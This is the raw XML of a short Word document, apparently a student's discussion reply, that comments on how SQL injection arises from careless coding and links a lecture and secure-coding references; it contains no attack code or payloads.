    <w:p w14:paraId="57E273EC" w14:textId="77777777" w:rsidR="00AF7489" w:rsidRPr="00AF7489" w:rsidRDefault="00AF7489" w:rsidP="00AF7489">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F64B0B1" w14:textId="022F53B8" w:rsidR="00D52AC4" w:rsidRDefault="007E448F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Brian,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAB58B6" w14:textId="6A07BE1B" w:rsidR="007E448F" w:rsidRDefault="007E448F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">I find it very interesting how systems can be exposed to SQL injections that easily. With your examples and other that I have seen, it seems that a lot of it has to do with whoever wrote the code being lazy. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>There’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> an interesting lecture by David Malan that shows an example of how someone might execute an SQL injection and shows what can be done to mitigate it. The whole lecture is great but the explanation on the SQL injection starts at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1hour 43min</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5BE892" w14:textId="512A9AA5" w:rsidR="007E448F" w:rsidRPr="007E448F" w:rsidRDefault="007E448F">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=TplT4qjz1RQ&amp;t=1s</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="007E448F" w:rsidRPr="007E44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46480305"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="23CA4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6CD"/>
    <w:rsid w:val="00192B59"/>
    <w:rsid w:val="001B3441"/>
    <w:rsid w:val="00324837"/>
    <w:rsid w:val="00343A3C"/>
    <w:rsid w:val="006526CD"/>
    <w:rsid w:val="007E448F"/>
    <w:rsid w:val="008B2879"/>
    <w:rsid w:val="009947F4"/>
    <w:rsid w:val="00A03E81"/>
    <w:rsid w:val="00AF7489"/>
    <w:rsid w:val="00BB6B81"/>
    <w:rsid w:val="00D24FC3"/>
    <w:rsid w:val="00D52AC4"/>
    <w:rsid w:val="00EF56E8"/>
    <w:rsid w:val="00F415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0B954"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{29F05FF8-6732-48CB-B7AB-A5FFB7FA69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415AD"/>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F415A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415AD"/>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415A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F415A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415AD"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ft">
    <w:name w:val="ft"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00F415AD"/>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F415AD"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="it">
    <w:name w:val="it"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00F415A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F415AD"/>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03E81"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00324837"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00343A3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43A3C"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kd">
    <w:name w:val="kd"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00343A3C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nx">
    <w:name w:val="nx"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00343A3C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="o">
    <w:name w:val="o"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00343A3C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="k">
    <w:name w:val="k"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00343A3C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="p">
    <w:name w:val="p"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00343A3C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nb">
    <w:name w:val="nb"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00343A3C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="dl">
    <w:name w:val="dl"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00343A3C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s1">
    <w:name w:val="s1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00343A3C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kc">
    <w:name w:val="kc"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00343A3C"/>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AF74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521364541">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="538904475">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1002851423">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="612323755">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1108697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9781320">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="436025523">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="150"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1794593969">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="150"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="DFE1E5"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="DFE1E5"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DFE1E5"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="DFE1E5"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="880557450">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1081833672">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="376659428">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523010021">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1237010608">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="150"/>
              <w:marBottom w:val="150"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="0" w:color="DFE1E5"/>
                <w:left w:val="single" w:sz="6" w:space="0" w:color="DFE1E5"/>
                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DFE1E5"/>
                <w:right w:val="single" w:sz="6" w:space="0" w:color="DFE1E5"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="535429629">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="199364483">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="65349099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 w:id="1171599105">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1485976551">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="150"/>
              <w:marBottom w:val="150"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="0" w:color="DFE1E5"/>
                <w:left w:val="single" w:sz="6" w:space="0" w:color="DFE1E5"/>
                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DFE1E5"/>
                <w:right w:val="single" w:sz="6" w:space="0" w:color="DFE1E5"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1961378549">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="264775772">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="47560827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bs.integrity.pt/articles/review-android-webviews-fileaccess-attack-vectors/index.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/android/DRD02-J.+Do+not+allow+WebView+to+access+sensitive+local+resource+through+file+schem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youtube.com/watch?v=TplT4qjz1RQ&amp;t=1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267</TotalTime>
  <Pages>1</Pages>
  <Words>982</Words>
  <Characters>5598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Beck</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Dan Beck</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-07-25T20:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-28T04:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>